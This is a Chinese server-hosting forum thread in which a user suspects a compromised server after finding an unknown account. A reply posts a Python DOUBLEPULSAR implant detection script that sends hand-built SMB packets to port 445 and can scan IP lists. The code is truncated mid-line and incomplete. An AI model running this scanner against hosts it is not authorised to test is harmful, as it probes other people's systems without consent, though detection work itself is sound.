找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 52|回复: 1

KS3C被黑?能怎样查?

[复制链接]

69

主题

284

回帖

1331

积分

金牌会员

积分
1331
发表于 2017-4-22 22:42:21 | 显示全部楼层 |阅读模式
一直连接着桌面的,突然到了注销页面,看了后好像多了个账户,上次那个漏洞怎样查的?系统是DD的


回复

使用道具 举报

43

主题

1026

回帖

3740

积分

论坛元老

积分
3740
发表于 2017-4-22 23:08:11 | 显示全部楼层
是这个吗?
[ol][*]#!/usr/bin/python
[*]
[*]import binascii
[*]import socket
[*]import argparse
[*]import struct
[*]import threading
[*]
[*]
[*]# Packets
[*]negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
[*]session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
[*]tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
[*]trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
[*]
[*]# Arguments
[*]parser = argparse.ArgumentParser(description="Detect present of DOUBLEPULSAR implant\n\nAuthor: Luke Jennings\nWebsite: https://countercept.com\n推特: @countercept", formatter_class=argparse.RawTextHelpFormatter)
[*]group = parser.add_mutually_exclusive_group(required=True)
[*]group.add_argument('--ip', help='Single IP address to check')
[*]group.add_argument('--file', help='File containing a list of IP addresses to check')
[*]parser.add_argument('--timeout', help="Timeout on connection for socket in seconds", default=None)
[*]parser.add_argument('--verbose', help="Verbose output for checking of commands", action='store_true')
[*]parser.add_argument('--threads', help="Number of connection threads when checking file of IPs (default 10)", default="10")
[*]
[*]args = parser.parse_args()
[*]ip = args.ip
[*]filename = args.file
[*]timeout = args.timeout
[*]verbose = args.verbose
[*]num_threads = int(args.threads)
[*]semaphore = threading.BoundedSemaphore(value=num_threads)
[*]print_lock = threading.Lock()
[*]
[*]
[*]def print_status(ip, message):
[*]    global print_lock
[*]
[*]    with print_lock:
[*]        print "[*] [%s] %s" % (ip, message)
[*]
[*]
[*]def check_ip(ip):
[*]    global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
[*]
[*]    # Connect to socket
[*]    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
[*]    s.settimeout(float(timeout) if timeout else None)
[*]    host = ip
[*]    port = 445
[*]    s.connect((host, port))
[*]
[*]    # Send/receive negotiate protocol request
[*]    if verbose:
[*]        print_status(ip, "Sending negotation protocol request")
[*]    s.send(negotiate_protocol_request)
[*]    s.recv(1024)
[*]
[*]    # Send/receive session setup request
[*]    if verbose:
[*]        print_status(ip, "Sending session setup request")
[*]    s.send(session_setup_request)
[*]    session_setup_response = s.recv(1024)
[*]
[*]    # Extract user ID from session setup response
[*]    user_id = session_setup_response[32:34]
[*]    if verbose:
[*]        print_status(ip, "User ID = %s" % struct.unpack("复制代码
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|HS2V主机综合交流论坛

GMT+8, 2024-11-20 02:33 , Processed in 0.041219 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表